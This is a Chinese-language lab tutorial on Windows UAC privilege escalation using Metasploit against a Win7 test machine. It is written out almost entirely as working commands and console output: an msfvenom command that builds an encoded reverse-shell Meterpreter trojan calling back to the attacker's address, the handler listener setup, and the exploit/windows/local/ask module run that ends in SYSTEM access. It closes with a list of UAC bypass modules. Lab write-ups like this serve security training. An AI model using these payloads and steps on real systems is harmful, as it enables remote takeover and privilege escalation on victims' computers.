windows之UAC提权

前期准备

目标机	攻击机
win7	kali
192.168.43.254	192.168.43.113

我这里，只演示攻击过程，如果有不懂的命令可以去看看我其他的文章有专门我做命令的笔记或者自行去百度。

UAC简介

UAC(User Account Control，用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术，它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前，提供权限或管理员‌密码。

也就是说一旦用户允许启动的应用程序通过UAC验证，那么这个程序也就有了管理员权限。如果我们通过某种方式劫持了通过用户UAC验证的程序，那么相应的我们的程序也就实现了提权的过程。

前期演示

由于是演示，那么这里我们直接msf生成一个木马来拿到一个shell

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.113 LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -f exe > uac.exe

设置监听

use exploit/multi/handler 

设置payload

set payload windows/meterpreter/reverse_tcp

设置监听的IP和端口

set lhost 192.168.43.113
set lport 6666

然后run，打开win7的机器点击uac.exe打开kali已经拿到了shell

msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.113:6666 
[*] Sending stage (179779 bytes) to 192.168.43.254
[*] Meterpreter session 1 opened (192.168.43.113:6666 -> 192.168.43.254:50063) at 2020-10-05 22:02:08 +0800

meterpreter > 

可以看到是个管理员权限

meterpreter > getuid
Server username: LS--20200725FKO\Administrator

然后我们getsystem提权失败把它放到后台

meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > se
search    services  sessions  set       setg      
msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  2         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:50080 (192.168.43.254)

UAC提权

放到后台之后，使用下面这个模块

use exploit/windows/local/ask

查看一下模块信息，然后设置我们要设置的

msf5 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME                    no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION                     yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the 
  ShellExecute undocumented RunAs flag to bypass low UAC settings.

通过上面，我们知道要设置一下session

msf5 exploit(windows/local/ask) > set session 2
session => 2

另外两个不是必须的，可设置也可不设置，然后run

msf5 exploit(windows/local/ask) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  5         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
  6         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)

可以看到有两个session但是都是管理员权限

msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > 

我们进到6里面

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

拿到system权限

模块名称	我的理解
exploit/windows/local/ask	需要点击
exploit/windows/local/bypassuac	不需要点击
Exploit/windows/local/ms14_058_track_popup_menu